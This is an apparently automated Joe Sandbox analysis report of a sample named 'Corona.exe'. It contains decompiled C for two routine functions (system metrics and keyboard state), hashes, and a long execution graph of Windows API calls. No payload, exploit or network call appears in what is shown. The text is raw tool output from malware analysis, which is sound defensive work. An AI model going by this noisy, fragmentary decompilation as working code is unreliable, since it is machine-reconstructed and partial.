                                  			E00425340(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x47092c == 0) {
					 *0x470904 = E0042525C(0, _t8,  *0x470904, _t17, _t18);
					return GetSystemMetrics(_t8);
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}












                                  0x00425344
                                  0x0042534e
                                  0x00425362
                                  0x00000000
                                  0x00425368
                                  0x00425370
                                  0x00425378
                                  0x00425378
                                  0x0042537b
                                  0x0042538f
                                  0x0042537d
                                  0x0042537d
                                  0x00425393
                                  0x0042537f
                                  0x0042537f
                                  0x0042537f
                                  0x00425380
                                  0x00425397
                                  0x00425382
                                  0x00425383
                                  0x00425386
                                  0x00425388
                                  0x00425388
                                  0x00425386
                                  0x00425380
                                  0x0042537d
                                  0x0042539c
                                  0x0042539f
                                  0x004253a9
                                  0x004253a1
                                  0x00000000
                                  0x004253a2

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 004253A2
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  • GetSystemMetrics.USER32 ref: 00425368
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$AddressProc
                                  • String ID: GetSystemMetrics
                                  • API String ID: 1792783759-96882338
                                  • Opcode ID: b2fc06f352e338549a50a20148af2b1428e776a032ad9fa79cce12c08c9ebe4f
                                  • Instruction ID: fbce5eb428aeec31300f1743459cd9658f4b93445a861dd91e49e670b50fdd29
                                  • Opcode Fuzzy Hash: b2fc06f352e338549a50a20148af2b1428e776a032ad9fa79cce12c08c9ebe4f
                                  • Instruction Fuzzy Hash: 25F096F0715A28CAD710C734BD8423A374597953B0FD06E33EA1686AD5C1FC9C81561D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448C38, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E00448C38(void* __eax) {
				signed char _v17;
				signed char _v24;
				signed int _t8;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t8 = _v24 & 0x000000ff;
				if(_t8 != 0) {
					if(GetKeyState(0x10) < 0) {
						_t8 = _t8 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_t8 = _t8 + 0x4000;
					}
					if((_v17 & 0x00000020) != 0) {
						_t8 = _t8 + 0x8000;
					}
				}
				return _t8;
			}






                                  0x00448c43
                                  0x00448c44
                                  0x00448c45
                                  0x00448c46
                                  0x00448c47
                                  0x00448c4f
                                  0x00448c5b
                                  0x00448c5d
                                  0x00448c5d
                                  0x00448c6c
                                  0x00448c6e
                                  0x00448c6e
                                  0x00448c78
                                  0x00448c7a
                                  0x00448c7a
                                  0x00448c78
                                  0x00448c87

                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 00448C53
                                  • GetKeyState.USER32(00000011), ref: 00448C64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: 4fc2664c9da60407ce52c29c3fefb565ddfb21a5d1a5af4f2281d8f349cb0f06
                                  • Instruction ID: 00cf6cdc7884a40f663b642f68fb97ab7c433ce7d7085603b7435de91eb9e162
                                  • Opcode Fuzzy Hash: 4fc2664c9da60407ce52c29c3fefb565ddfb21a5d1a5af4f2281d8f349cb0f06
                                  • Instruction Fuzzy Hash: 90E06822701B4212F61274AE1CC03EB23C04FA33ACF09027FFDC42E1C2EA9E091151B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: Corona.exe PID: 6984 Parent PID: 6912 Corona.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:961
                                  Total number of Limit Nodes:31

                                  Graph

                                  execution_graph 28499 41a100 28504 4326b0 28499->28504 28511 44cc30 28499->28511 28519 44cf30 28499->28519 28500 41a116 28607 432908 28504->28607 28507 4326f1 28626 4202d0 91 API calls 28507->28626 28509 4326f6 28509->28500 28512 44cc46 28511->28512 28513 44ccd4 28511->28513 28512->28513 28514 44cc53 EnumWindows 28512->28514 28513->28500 28514->28513 28515 44cc76 GetWindow GetWindowLongA 28514->28515 28653 44cbc0 GetWindow 28514->28653 28516 44cc93 28515->28516 28516->28513 28648 4136f8 28516->28648 28520 44cf98 28519->28520 28524 44cf66 28519->28524 28656 44cde4 28520->28656 28522 4136f8 56 API calls 28522->28524 28523 44cfa3 28525 44d061 28523->28525 28526 44cfb3 28523->28526 28524->28520 28524->28522 28602 44cf87 28524->28602 28529 44d0b7 28525->28529 28530 44d068 28525->28530 28527 44d4ff 28526->28527 28528 44cfb9 28526->28528 28687 44e050 12 API calls 28527->28687 28538 44d02d 28528->28538 28539 44d04a 28528->28539 28576 44d045 28528->28576 28528->28602 28531 44d0dd 28529->28531 28532 44d0be 28529->28532 28534 44d3d7 28530->28534 28535 44d06e 28530->28535 28551 44d394 28531->28551 28531->28576 28531->28602 28540 44d0c4 28532->28540 28541 44d519 28532->28541 28582 44d3fd IsWindowEnabled 28534->28582 28534->28602 28536 44d075 28535->28536 28537 44d09e 28535->28537 28559 44d082 28536->28559 28560 44d0f9 28536->28560 28536->28602 28562 44d3b5 28537->28562 28537->28576 28537->28602 28543 44d5a3 28538->28543 28544 44d033 28538->28544 28545 44d053 28539->28545 28546 44d18f 28539->28546 28549 44d4c0 IsIconic 28540->28549 28550 44d0cf 28540->28550 28547 44d522 28541->28547 28548 44d53a 28541->28548 28542 44d354 28542->28602 28705 44cea8 NtdllDefWindowProc_A 28543->28705 28553 44d03c 28544->28553 28554 44d57d 28544->28554 28545->28576 28578 44d2e0 28545->28578 28676 44d634 28546->28676 28688 44db10 26 API calls 28547->28688 28689 44db6c 57 API calls 28548->28689 28552 44d4d4 GetFocus 28549->28552 28549->28602 28550->28527 28550->28576 28682 44ef7c 126 API calls 28551->28682 28565 44d4e5 28552->28565 28552->28602 28566 44d1c3 28553->28566 28553->28576 28690 4396d0 28554->28690 28568 44d298 SendMessageA 28559->28568 28559->28576 28563 44d114 28560->28563 28564 44d10b 28560->28564 28683 44d9e8 IsWindowEnabled 28562->28683 28673 44d650 70 API calls 28563->28673 28571 44d121 28564->28571 28572 44d112 28564->28572 28686 444d68 GetCurrentThreadId 72E7AC10 28565->28686 28663 44cea8 NtdllDefWindowProc_A 28566->28663 28568->28602 28674 44d700 137 API calls 28571->28674 28675 44cea8 NtdllDefWindowProc_A 28572->28675 28576->28602 28672 44cea8 NtdllDefWindowProc_A 28576->28672 28577 44d58f 28703 44ce3c 11 API calls 28577->28703 28584 44d30e 28578->28584 28578->28602 28580 44d4ec 28586 44d4f4 SetFocus 28580->28586 28580->28602 28581 44d1c9 28587 44d1e6 28581->28587 28588 44d208 28581->28588 28589 44d40b 28582->28589 28582->28602 28681 40cbf0 SetErrorMode LoadLibraryA 28584->28681 28586->28602 28664 44cd48 28587->28664 28669 44cd38 28588->28669 28600 44d412 IsWindowVisible 28589->28600 28590 44d59a 28704 44cea8 NtdllDefWindowProc_A 28590->28704 28592 44d31d 28596 44d36c GetLastError 28592->28596 28597 44d32c GetProcAddress 28592->28597 28596->28602 28597->28542 28597->28602 28601 44d420 GetFocus 28600->28601 28600->28602 28684 434ef4 28601->28684 28602->28500 28604 44d435 SetFocus 28605 42f98c 126 API calls 28604->28605 28606 44d454 SetFocus 28605->28606 28606->28602 28608 432933 28607->28608 28609 43291b 28607->28609 28613 43292e 28608->28613 28641 432874 126 API calls 28608->28641 28610 43298d 28609->28610 28611 43291d 28609->28611 28612 42fa58 124 API calls 28610->28612 28611->28613 28617 432a2a GetCapture 28611->28617 28619 432996 28612->28619 28622 4326df 28613->28622 28627 42fa58 28613->28627 28615 4329e7 28615->28613 28620 4329eb 28615->28620 28617->28613 28618 432a35 28617->28618 28618->28613 28642 42f98c 28618->28642 28619->28622 28640 4327e0 126 API calls 28619->28640 28620->28622 28624 432a0e NtdllDefWindowProc_A 28620->28624 28625 42d21c 89 API calls 28622->28625 28624->28622 28625->28507 28626->28509 28628 42fa6e 28627->28628 28629 42fbc3 28628->28629 28630 42fab4 28628->28630 28633 42fafc 28628->28633 28636 42fb45 28628->28636 28631 42fbda KiUserCallbackDispatcher 28629->28631 28647 42e394 126 API calls 28629->28647 28630->28631 28630->28636 28631->28636 28634 42fb2a 28633->28634 28637 42fb1f 28633->28637 28646 44e788 126 API calls 28634->28646 28636->28622 28637->28630 28637->28631 28638 42fb86 GetKeyboardState 28637->28638 28639 42fba2 28638->28639 28639->28636 28640->28622 28641->28615 28643 42f9b3 28642->28643 28644 42f9a8 28642->28644 28643->28613 28645 432908 126 API calls 28644->28645 28645->28643 28646->28630 28647->28631 28649 413702 28648->28649 28650 413716 SetWindowPos 28649->28650 28652 413684 56 API calls 28649->28652 28650->28513 28650->28516 28652->28650 28654 44cbeb 28653->28654 28655 44cbdf GetWindowLongA 28653->28655 28655->28654 28657 44cdf7 28656->28657 28658 44ce11 28657->28658 28659 44ce02 SetThreadLocale 28657->28659 28662 44ce21 28657->28662 28658->28662 28707 44bda0 28658->28707 28706 40c248 74 API calls 28659->28706 28662->28523 28663->28581 28665 44cd57 28664->28665 28666 44cda6 PostMessageA 28664->28666 28665->28666 28667 4136f8 56 API calls 28665->28667 28666->28602 28668 44cd9a SetWindowPos 28667->28668 28668->28665 28668->28666 28670 44cc30 62 API calls 28669->28670 28671 44cd3f PostMessageA 28670->28671 28671->28602 28672->28602 28673->28602 28674->28602 28675->28602 28738 422a60 28676->28738 28679 44d643 LoadIconA 28680 44d64f 28679->28680 28680->28602 28681->28592 28682->28602 28683->28602 28685 434efe 28684->28685 28685->28604 28686->28580 28687->28542 28688->28542 28689->28542 28691 4396df 28690->28691 28693 4396d8 28690->28693 28753 439634 28691->28753 28694 4396dd 28693->28694 28696 43971b SendMessageA 28693->28696 28697 43970a SystemParametersInfoA 28693->28697 28694->28577 28696->28694 28697->28694 28698 4396f5 28757 439650 SystemParametersInfoA 28698->28757 28699 4396ec 28756 439680 6 API calls 28699->28756 28702 4396fc 28702->28577 28703->28590 28704->28602 28705->28602 28706->28658 28708 44bdb9 28707->28708 28709 44bdea SystemParametersInfoA 28708->28709 28733 44e290 126 API calls 28708->28733 28711 44be15 GetStockObject 28709->28711 28712 44bdfd CreateFontIndirectA 28709->28712 28713 41c5e8 30 API calls 28711->28713 28728 41c5e8 28712->28728 28716 44be29 SystemParametersInfoA 28713->28716 28717 44be7d 28716->28717 28718 44be49 CreateFontIndirectA 28716->28718 28734 41c6cc 30 API calls 28717->28734 28719 41c5e8 30 API calls 28718->28719 28721 44be62 CreateFontIndirectA 28719->28721 28723 41c5e8 30 API calls 28721->28723 28722 44be8d GetStockObject 28724 41c5e8 30 API calls 28722->28724 28726 44be7b 28723->28726 28724->28726 28725 44bee4 28725->28662 28726->28725 28735 44e290 126 API calls 28726->28735 28736 41c1a4 GetObjectA 28728->28736 28730 41c5fa 28737 41c3dc 29 API calls 28730->28737 28732 41c603 28732->28716 28733->28709 28734->28722 28735->28725 28736->28730 28737->28732 28741 422a9c 28738->28741 28742 422a6a 28741->28742 28743 422aac 28741->28743 28742->28679 28742->28680 28743->28742 28750 415564 56 API calls 28743->28750 28745 422acb 28745->28742 28746 422ae5 28745->28746 28747 422ad8 28745->28747 28751 41e104 62 API calls 28746->28751 28752 41d5b0 56 API calls 28747->28752 28750->28745 28751->28742 28752->28742 28758 423864 28753->28758 28756->28694 28757->28702 28759 423874 28758->28759 28763 423894 28758->28763 28765 42377c 28759->28765 28762 4238cb 28762->28698 28762->28699 28763->28762 28764 4238c5 GetSystemMetrics 28763->28764 28764->28762 28766 423792 28765->28766 28768 423805 28766->28768 28769 4237ed 28766->28769 28772 42377c 11 API calls 28766->28772 28776 403e4c 28768->28776 28771 4237f5 GetProcAddress 28769->28771 28771->28768 28773 4237d7 28772->28773 28773->28769 28774 4237e5 28773->28774 28775 403e4c 11 API calls 28774->28775 28775->28769 28777 403e52 28776->28777 28778 403e6d KiUserCallbackDispatcher 28776->28778 28777->28778 28780 4026dc 11 API calls 28777->28780 28778->28762 28780->28778 28781 43c580 28782 43c594 28781->28782 28783 43c5cf 28781->28783 28798 40ba08 28782->28798 28787 43c631 28783->28787 28788 43c5f9 28783->28788 28785 43c59e 28785->28783 28786 43c5af GetModuleHandleA 28785->28786 28786->28783 28789 43c5bf GetProcAddress 28786->28789 28817 43b4c8 59 API calls 28787->28817 28815 43b4c8 59 API calls 28788->28815 28789->28783 28792 43c643 73451DE0 28793 43c64d 28792->28793 28796 43c62a 28792->28796 28818 40b274 56 API calls 28793->28818 28795 43c60d 28795->28796 28816 40b274 56 API calls 28795->28816 28819 403ee4 28798->28819 28802 40ba3d 28803 40ba49 739414E0 28802->28803 28804 40ba55 28803->28804 28805 40bac8 28803->28805 28829 4026bc 28804->28829 28808 403e4c 11 API calls 28805->28808 28807 40ba5c 28810 40ba7e 739414C0 28807->28810 28809 40badd 28808->28809 28809->28785 28811 40ba88 73941500 28810->28811 28812 40baa2 28810->28812 28811->28812 28835 4026dc 11 API calls 28812->28835 28814 40bac0 28814->28785 28815->28795 28816->28796 28817->28792 28818->28796 28821 403ee8 28819->28821 28820 403f0c 28823 40435c 28820->28823 28821->28820 28836 4026dc 11 API calls 28821->28836 28824 404318 28823->28824 28826 404353 28824->28826 28837 403f10 28824->28837 28826->28802 28827 40432f 28827->28826 28842 4026dc 11 API calls 28827->28842 28830 4026c1 28829->28830 28833 4026d4 28829->28833 28843 4020e8 28830->28843 28831 4026c7 28831->28833 28854 4027cc 11 API calls 28831->28854 28833->28807 28835->28814 28836->28820 28838 403f14 28837->28838 28839 403f38 28837->28839 28840 4026bc 25 API calls 28838->28840 28839->28827 28841 403f21 28840->28841 28841->28827 28842->28826 28844 4020fc 28843->28844 28846 402101 28843->28846 28855 4019fc RtlInitializeCriticalSection 28844->28855 28847 40212e RtlEnterCriticalSection 28846->28847 28848 402138 28846->28848 28851 40210d 28846->28851 28847->28848 28848->28851 28862 401ff4 28848->28862 28851->28831 28852 402263 28852->28831 28853 402259 RtlLeaveCriticalSection 28853->28852 28854->28833 28856 401a20 RtlEnterCriticalSection 28855->28856 28857 401a2a 28855->28857 28856->28857 28858 401a48 LocalAlloc 28857->28858 28859 401a62 28858->28859 28860 401ab1 28859->28860 28861 401aa7 RtlLeaveCriticalSection 28859->28861 28860->28846 28861->28860 28865 402004 28862->28865 28863 402030 28866 402054 28863->28866 28873 401e08 28863->28873 28865->28863 28865->28866 28868 401f68 28865->28868 28866->28852 28866->28853 28877 4017bc 28868->28877 28870 401f78 28871 401f85 28870->28871 28886 401edc 9 API calls 28870->28886 28871->28865 28874 401e5d 28873->28874 28876 401e26 28873->28876 28874->28876 28902 401d58 28874->28902 28876->28866 28880 4017d8 28877->28880 28879 4017e2 28887 4016a8 28879->28887 28880->28879 28882 4017ee 28880->28882 28884 401833 28880->28884 28891 401514 28880->28891 28899 401410 LocalAlloc 28880->28899 28882->28870 28900 4015f0 VirtualFree 28884->28900 28886->28871 28889 4016ee 28887->28889 28888 40171e 28888->28882 28889->28888 28890 40170a VirtualAlloc 28889->28890 28890->28888 28890->28889 28892 401523 VirtualAlloc 28891->28892 28894 401550 28892->28894 28895 401573 28892->28895 28901 4013c8 LocalAlloc 28894->28901 28895->28880 28897 40155c 28897->28895 28898 401560 VirtualFree 28897->28898 28898->28895 28899->28880 28900->28882 28901->28897 28904 401d6e 28902->28904 28903 401df6 28903->28876 28904->28903 28905 401d99 28904->28905 28906 401dad 28904->28906 28915 401970 28905->28915 28908 401970 3 API calls 28906->28908 28909 401dab 28908->28909 28909->28903 28925 401c34 9 API calls 28909->28925 28911 401dd1 28912 401deb 28911->28912 28926 401c88 9 API calls 28911->28926 28927 401480 LocalAlloc 28912->28927 28916 401996 28915->28916 28924 4019ef 28915->28924 28928 40173c 28916->28928 28920 4019b3 28921 4019ca 28920->28921 28933 4015f0 VirtualFree 28920->28933 28921->28924 28934 401480 LocalAlloc 28921->28934 28924->28909 28925->28911 28926->28912 28927->28903 28930 401773 28928->28930 28929 4017b3 28932 401410 LocalAlloc 28929->28932 28930->28929 28931 40178d VirtualFree 28930->28931 28931->28930 28932->28920 28933->28921 28934->28924 28935 42e704 28936 42e710 28935->28936 28937 42e730 28935->28937 28938 42f98c 126 API calls 28936->28938 28938->28937 28939 4325e8 28941 4325f0 28939->28941 28940 432623 28941->28940 28943 4324ec 28941->28943 28944 432501 28943->28944 28946 432573 28944->28946 28948 4136f8 56 API calls 28944->28948 28949 4324ec 126 API calls 28944->28949 28945 4325b8 28945->28940 28946->28945 28947 42f98c 126 API calls 28946->28947 28947->28945 28948->28944 28949->28944 28950 44f548 28959 405c34 GetModuleHandleA 28950->28959 28952 44f558 28963 44dc00 28952->28963 28954 44f57c 28967 44dc80 28954->28967 28960 405c67 28959->28960 28981 403b94 28960->28981 28964 44dc13 28963->28964 29213 446438 28964->29213 28965 44dc34 28965->28954 29436 4078ec 25 API calls 28967->29436 28969 44dcac 28970 44dd46 28969->28970 28971 44dcd5 28969->28971 28972 44dcc7 28969->28972 28980 403d5c 7 API calls 28970->28980 29442 448374 ShowWindow 28971->29442 28974 44dcfc 28972->28974 28975 44dcf4 28972->28975 28976 44dcfe 28972->28976 28974->28970 29437 44daec 28974->29437 29443 44d650 70 API calls 28975->29443 29444 44727c 126 API calls 28976->29444 28982 403bc7 28981->28982 28985 403b34 28982->28985 28986 403b70 28985->28986 28987 403b43 28985->28987 28986->28952 28987->28986 28990 4026bc 25 API calls 28987->28990 28991 404ea0 28987->28991 28995 439d64 28987->28995 28990->28987 28992 404eb0 GetModuleFileNameA 28991->28992 28994 404ecc 28991->28994 29009 4050dc GetModuleFileNameA RegOpenKeyExA 28992->29009 28994->28987 28996 439d7e GetVersion 28995->28996 28997 439ddc 28995->28997 29028 439b30 GetCurrentProcessId 28996->29028 28997->28987 29001 439da2 29062 412fd4 58 API calls 29001->29062 29003 439dac 29063 412f80 58 API calls 29003->29063 29005 439dbc 29064 412f80 58 API calls 29005->29064 29007 439dcc 29065 412f80 58 API calls 29007->29065 29010 40515f 29009->29010 29011 40511f RegOpenKeyExA 29009->29011 29027 404f24 12 API calls 29010->29027 29011->29010 29012 40513d RegOpenKeyExA 29011->29012 29012->29010 29014 4051e8 lstrcpyn GetThreadLocale GetLocaleInfoA 29012->29014 29016 405302 29014->29016 29017 40521f 29014->29017 29015 405184 RegQueryValueExA 29018 4051a4 RegQueryValueExA 29015->29018 29019 4051c2 RegCloseKey 29015->29019 29016->28994 29017->29016 29020 40522f lstrlen 29017->29020 29018->29019 29019->28994 29022 405247 29020->29022 29022->29016 29023 405294 29022->29023 29024 40526c lstrcpyn LoadLibraryExA 29022->29024 29023->29016 29025 40529e lstrcpyn LoadLibraryExA 29023->29025 29024->29023 29025->29016 29026 4052d0 lstrcpyn LoadLibraryExA 29025->29026 29026->29016 29027->29015 29066 408938 29028->29066 29032 439b79 29033 439b83 GlobalAddAtomA GetCurrentThreadId 29032->29033 29034 408938 56 API calls 29033->29034 29035 439bbd 29034->29035 29036 403ea0 25 API calls 29035->29036 29037 439bca 29036->29037 29038 439bd4 GlobalAddAtomA 29037->29038 29075 40430c 29038->29075 29042 439c01 29081 439734 29042->29081 29044 439c0b 29089 43955c 29044->29089 29046 439c17 29093 44b5c4 29046->29093 29048 439c2a 29110 44c6a8 29048->29110 29050 439c40 29124 44e290 126 API calls 29050->29124 29052 439c56 29125 4130c0 58 API calls 29052->29125 29054 439c6a GetModuleHandleA 29055 439c8a 29054->29055 29056 439c7a GetProcAddress 29054->29056 29057 403e4c 11 API calls 29055->29057 29056->29055 29058 439c9f 29057->29058 29059 403e4c 11 API calls 29058->29059 29060 439ca7 29059->29060 29061 412f34 58 API calls 29060->29061 29061->29001 29062->29003 29063->29005 29064->29007 29065->28997 29126 40894c 29066->29126 29069 403ea0 29071 403ea4 29069->29071 29073 403eb4 29069->29073 29070 403ee2 29070->29032 29072 403f10 25 API calls 29071->29072 29071->29073 29072->29073 29073->29070 29148 4026dc 11 API calls 29073->29148 29076 404310 RegisterClipboardFormatA 29075->29076 29077 41390c 29076->29077 29078 413912 29077->29078 29079 413927 RtlInitializeCriticalSection 29078->29079 29080 41393c 29079->29080 29080->29042 29082 4398a1 29081->29082 29083 439748 SetErrorMode 29081->29083 29082->29044 29084 439788 29083->29084 29085 43976c GetModuleHandleA GetProcAddress 29083->29085 29086 439883 SetErrorMode 29084->29086 29087 439795 LoadLibraryA 29084->29087 29085->29084 29086->29044 29087->29086 29088 4397b1 10 API calls 29087->29088 29088->29086 29090 439562 29089->29090 29091 4396d0 23 API calls 29090->29091 29092 4395d0 29091->29092 29092->29046 29094 44b5ce 29093->29094 29149 419098 29094->29149 29096 44b5e4 29153 44b980 LoadCursorA 29096->29153 29099 44b61d 29100 44b659 72E7AC50 72E7AD70 72E7B380 29099->29100 29101 44b68f 29100->29101 29158 41c258 29101->29158 29103 44b69b 29104 41c258 27 API calls 29103->29104 29105 44b6ad 29104->29105 29106 41c258 27 API calls 29105->29106 29107 44b6bf 29106->29107 29108 44bda0 137 API calls 29107->29108 29109 44b6cc 29108->29109 29109->29048 29111 44c6b7 29110->29111 29112 419098 56 API calls 29111->29112 29113 44c6cd 29112->29113 29114 44c778 LoadIconA 29113->29114 29176 422cf4 29114->29176 29116 44c79b GetModuleFileNameA OemToCharA 29117 44c7e4 29116->29117 29118 44c80a CharLowerA 29117->29118 29119 44c82d 29118->29119 29120 44c83e 29119->29120 29178 44c9b0 29119->29178 29202 44e6f4 11 API calls 29120->29202 29123 44c860 29123->29050 29124->29052 29125->29054 29127 408970 29126->29127 29128 40899b 29127->29128 29139 408540 56 API calls 29127->29139 29130 4089f3 29128->29130 29137 4089b0 29128->29137 29143 403f3c 29130->29143 29132 408947 29132->29069 29133 4089e9 29142 404498 25 API calls 29133->29142 29134 403e4c 11 API calls 29134->29137 29137->29133 29137->29134 29140 404498 25 API calls 29137->29140 29141 408540 56 API calls 29137->29141 29139->29128 29140->29137 29141->29137 29142->29132 29144 403f10 25 API calls 29143->29144 29145 403f4c 29144->29145 29146 403e4c 11 API calls 29145->29146 29147 403f64 29146->29147 29147->29132 29148->29070 29150 41909f 29149->29150 29152 4190c2 29150->29152 29162 419250 56 API calls 29150->29162 29152->29096 29154 44b99f 29153->29154 29155 44b9b8 LoadCursorA 29154->29155 29157 44b607 GetKeyboardLayout 29154->29157 29163 44ba38 29155->29163 29157->29099 29159 41c25e 29158->29159 29166 41b79c 29159->29166 29161 41c280 29161->29103 29162->29152 29164 4026bc 25 API calls 29163->29164 29165 44ba4b 29164->29165 29165->29154 29167 41b7b7 29166->29167 29174 41b784 RtlEnterCriticalSection 29167->29174 29169 41b7c1 29170 4026bc 25 API calls 29169->29170 29171 41b81e 29169->29171 29170->29171 29175 41b790 RtlLeaveCriticalSection 29171->29175 29173 41b86f 29173->29161 29174->29169 29175->29173 29177 422d00 29176->29177 29177->29116 29179 44c9d9 29178->29179 29180 44cb3b 29178->29180 29179->29180 29203 41a128 29179->29203 29181 403e4c 11 API calls 29180->29181 29183 44cb50 29181->29183 29183->29120 29184 44c9f2 GetClassInfoA 29185 44ca18 RegisterClassA 29184->29185 29190 44ca4d 29184->29190 29186 44ca31 29185->29186 29185->29190 29210 40597c 56 API calls 29186->29210 29188 44ca3e 29211 40b1b8 25 API calls 29188->29211 29206 4067f4 29190->29206 29192 44caa4 29193 403e4c 11 API calls 29192->29193 29194 44cab2 SetWindowLongA 29193->29194 29195 44cad2 29194->29195 29196 44cafd GetSystemMenu DeleteMenu DeleteMenu 29194->29196 29197 44d634 63 API calls 29195->29197 29196->29180 29198 44cb2e DeleteMenu 29196->29198 29199 44cad9 SendMessageA 29197->29199 29198->29180 29200 44d634 63 API calls 29199->29200 29201 44caf1 SetClassLongA 29200->29201 29201->29196 29202->29123 29204 41a166 29203->29204 29205 41a138 VirtualAlloc 29203->29205 29204->29184 29205->29204 29212 402908 29206->29212 29208 406807 CreateWindowExA 29209 40683f 29208->29209 29209->29192 29210->29188 29211->29190 29212->29208 29214 44644e 29213->29214 29215 446562 29214->29215 29222 4134b8 29214->29222 29215->28965 29217 446527 29217->28965 29218 4464de 29218->29217 29232 40597c 56 API calls 29218->29232 29220 446515 29233 40b1f4 56 API calls 29220->29233 29223 4134ce 29222->29223 29225 413503 29223->29225 29246 41332c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29223->29246 29234 413410 29225->29234 29228 41352e 29230 413546 29228->29230 29248 4133b4 56 API calls 29228->29248 29230->29218 29232->29220 29233->29217 29235 41348e 29234->29235 29238 41343a 29234->29238 29236 403e4c 11 API calls 29235->29236 29237 4134a5 29236->29237 29237->29228 29247 413384 56 API calls 29237->29247 29238->29235 29239 413410 180 API calls 29238->29239 29240 413452 29239->29240 29249 404e98 29240->29249 29244 413480 29257 4132a8 29244->29257 29246->29225 29247->29228 29248->29230 29266 404e70 VirtualQuery 29249->29266 29252 404ee8 29253 404ef2 29252->29253 29254 404f0f 29252->29254 29253->29254 29255 404ea0 30 API calls 29253->29255 29254->29244 29256 404f08 29255->29256 29256->29244 29258 4132b9 29257->29258 29259 4132c8 FindResourceA 29258->29259 29260 413325 29259->29260 29261 4132d8 29259->29261 29260->29235 29268 415bc8 29261->29268 29263 4132e9 29272 4156c8 29263->29272 29265 413304 29265->29235 29267 404e8a 29266->29267 29267->29252 29269 415bc9 29268->29269 29277 415c90 FindResourceA 29269->29277 29271 415c00 29271->29263 29289 415d4c 29272->29289 29274 4156e4 29293 417d80 29274->29293 29276 4156ff 29276->29265 29278 415cb5 29277->29278 29279 415cbc LoadResource 29277->29279 29287 415c20 56 API calls 29278->29287 29281 415cd6 SizeofResource LockResource 29279->29281 29282 415ccf 29279->29282 29283 415cf4 29281->29283 29288 415c20 56 API calls 29282->29288 29283->29271 29284 415cbb 29284->29279 29286 415cd5 29286->29281 29287->29284 29288->29286 29290 415d56 29289->29290 29291 4026bc 25 API calls 29290->29291 29292 415d6f 29291->29292 29292->29274 29321 418168 29293->29321 29296 417df8 29380 41818c 29296->29380 29297 417e2d 29298 41818c 56 API calls 29297->29298 29300 417e3e 29298->29300 29302 417e54 29300->29302 29303 417e47 29300->29303 29306 41818c 56 API calls 29302->29306 29305 41818c 56 API calls 29303->29305 29311 417e20 29305->29311 29308 417e6f 29306->29308 29307 417e0b 29310 41818c 56 API calls 29307->29310 29390 417d20 56 API calls 29308->29390 29310->29311 29326 412ba8 29311->29326 29315 417ec8 29316 417f58 29315->29316 29345 41d3a0 29315->29345 29355 446ae8 29315->29355 29317 4136f8 56 API calls 29316->29317 29318 417f98 29316->29318 29317->29316 29318->29276 29391 41692c 29321->29391 29324 417db9 29324->29296 29324->29297 29327 412bb5 29326->29327 29397 412a94 RtlEnterCriticalSection 29327->29397 29329 412c8f 29398 412b4c RtlLeaveCriticalSection 29329->29398 29330 412bec 29331 4136f8 56 API calls 29330->29331 29336 412c4e 29330->29336 29399 4125d0 56 API calls 29330->29399 29331->29330 29334 412ca6 29337 405be8 29334->29337 29335 4136f8 56 API calls 29335->29336 29336->29329 29336->29335 29338 405bf7 29337->29338 29339 405c1d TlsGetValue 29337->29339 29338->29315 29340 405c02 29339->29340 29341 405c27 29339->29341 29400 405ba4 LocalAlloc TlsSetValue 29340->29400 29341->29315 29343 405c07 TlsGetValue 29344 405c16 29343->29344 29344->29315 29346 41d406 29345->29346 29352 41d3b9 29345->29352 29346->29316 29347 41d3dd 29348 41d3ee 29347->29348 29402 41d43c 18 API calls 29347->29402 29349 41d3fa 29348->29349 29403 41d468 6 API calls 29348->29403 29349->29346 29404 41d498 10 API calls 29349->29404 29352->29347 29401 40b274 56 API calls 29352->29401 29356 446afb 29355->29356 29405 430f54 29356->29405 29358 446bb5 29410 446e70 74 API calls 29358->29410 29359 446b46 29359->29358 29361 446cb2 29359->29361 29368 446ba6 MulDiv 29359->29368 29362 446d17 29361->29362 